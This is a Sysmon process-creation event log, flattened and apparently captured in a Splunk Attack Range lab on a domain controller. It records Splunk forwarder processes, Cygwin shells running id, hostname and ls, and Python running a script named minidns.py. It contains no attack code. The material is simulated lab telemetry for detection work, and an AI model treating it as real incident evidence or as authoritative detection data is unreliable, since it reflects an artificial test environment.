AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061808Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:20.516{A8622C2F-55B8-6078-340D-00000000AE01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061798Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:19.845{A8622C2F-55B7-6078-330D-00000000AE01}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061788Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:19.264{A8622C2F-55B7-6078-320D-00000000AE01}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061764Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:17.358{A8622C2F-55B5-6078-310D-00000000AE01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061754Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:16.861{A8622C2F-55B4-6078-300D-00000000AE01}6588C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061744Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:16.246{A8622C2F-55B4-6078-2F0D-00000000AE01}4568C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061724Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:14.488{A8622C2F-55B2-6078-2E0D-00000000AE01}7052C:\Program Files\Notepad++\notepad++.exe7.95Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\temp\minidns.py"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=45833E3CFFD3716546665DCE0C343F2E,SHA256=5AEC02154C9A23F5D77B11853691449063AA0EF3988C4EB30048DEBBCEC8B947,IMPHASH=DE4B8987D5ADB218127887FA4130E9E8{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000061654Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:53.134{A8622C2F-559D-6078-2D0D-00000000AE01}3916C:\cygwin64\bin\hostname.exe-----hostname -I C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-559D-6078-2C0D-00000000AE01}4268C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | awk '{print $1}'" 154100x800000000000000061646Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:53.126{A8622C2F-559D-6078-2C0D-00000000AE01}4268C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | awk '{print $1}'"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-559D-6078-2B0D-00000000AE01}4788C:\Python27\python.exeC:\Python27\python.exe minidns.py 154100x800000000000000061636Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:53.057{A8622C2F-559D-6078-2B0D-00000000AE01}4788C:\Python27\python.exe-----C:\Python27\python.exe minidns.pyC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-559D-6078-2A0D-00000000AE01}6492C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061617Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:53.046{A8622C2F-559D-6078-2A0D-00000000AE01}6492C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061495Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:31.287{A8622C2F-5587-6078-290D-00000000AE01}5304C:\Python27\python.exe-----C:\Python27\python.exe c:tempminidns.pyC:\python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5587-6078-280D-00000000AE01}1332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061476Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:31.277{A8622C2F-5587-6078-280D-00000000AE01}1332C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061441Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:22.715{A8622C2F-557E-6078-270D-00000000AE01}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061428Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:22.230{A8622C2F-557E-6078-260D-00000000AE01}6696C:\Python27\python.exe-----C:\Python27\python.exe --versionC:\python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-557E-6078-250D-00000000AE01}5860C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:22.200{A8622C2F-557E-6078-250D-00000000AE01}5860C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061394Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:20.838{A8622C2F-557C-6078-240D-00000000AE01}2424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061384Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:20.061{A8622C2F-557C-6078-230D-00000000AE01}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:19.395{A8622C2F-557B-6078-220D-00000000AE01}3868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061354Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:18.335{A8622C2F-557A-6078-210D-00000000AE01}5444C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-557A-6078-200D-00000000AE01}2132C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061336Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:18.326{A8622C2F-557A-6078-200D-00000000AE01}2132C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061328Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:17.772{A8622C2F-5579-6078-1F0D-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061318Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:17.101{A8622C2F-5579-6078-1E0D-00000000AE01}2104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061305Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:16.279{A8622C2F-5578-6078-1D0D-00000000AE01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061246Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.098{A8622C2F-556B-6078-1C0D-00000000AE01}4220C:\cygwin64\bin\tzset.exe-----"C:\cygwin64\bin\tzset.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9A334E31142D616401445D77D38B145A,SHA256=3D76C166E2D05B23A6E164B1F9C251C771AEF4E423B00C2EBE4080682C93C243,IMPHASH=36078269731E740E482547ADAAC73406{A8622C2F-556B-6078-1B0D-00000000AE01}5344C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061236Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.089{A8622C2F-556B-6078-1B0D-00000000AE01}5344C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556B-6078-1A0D-00000000AE01}1736C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061225Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.081{A8622C2F-556B-6078-1A0D-00000000AE01}1736C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061213Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.064{A8622C2F-556B-6078-190D-00000000AE01}4056C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-556B-6078-180D-00000000AE01}6364C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061203Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.056{A8622C2F-556B-6078-180D-00000000AE01}6364C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556B-6078-170D-00000000AE01}6852C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061193Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.047{A8622C2F-556B-6078-170D-00000000AE01}6852C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061180Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.034{A8622C2F-556B-6078-160D-00000000AE01}6460C:\cygwin64\bin\id.exe-----"C:\cygwin64\bin\id.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=5800D64A2799F3182F90A7DBC34B5B1D,SHA256=0B939F24A18CBAF7C8FBBF8A8AE4F474CBDF61BD54870D687A584DA4B29E1FD3,IMPHASH=7D3F9B4155D2A624AD839B9C7F2F075A{A8622C2F-556B-6078-150D-00000000AE01}2408C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061170Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.025{A8622C2F-556B-6078-150D-00000000AE01}2408C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556B-6078-140D-00000000AE01}3008C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061160Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.017{A8622C2F-556B-6078-140D-00000000AE01}3008C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061138Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:02.998{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-120D-00000000AE01}6836C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000061123Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:02.981{A8622C2F-556A-6078-120D-00000000AE01}6836C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-556A-6078-0F0D-00000000AE01}6240C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000061109Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:02.886{A8622C2F-556A-6078-100D-00000000AE01}6456C:\cygwin64\bin\cygwin-console-helper.exe-----"\\?\C:\cygwin64\bin\cygwin-console-helper.exe" 0x418 0x41CC:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8BFA89E9045A949619C8511955C39779,SHA256=7B4BB51FC16D1B4F44D2A73D9939C177008D5DB4E9EECCA42A9D01D90D7C8CEF,IMPHASH=DC4FCFEBC59A5F04DB2C6D852B01071C{A8622C2F-556A-6078-0F0D-00000000AE01}6240C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000061072Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:02.716{A8622C2F-556A-6078-0F0D-00000000AE01}6240C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000060774Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:22.711{A8622C2F-5542-6078-0C0D-00000000AE01}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 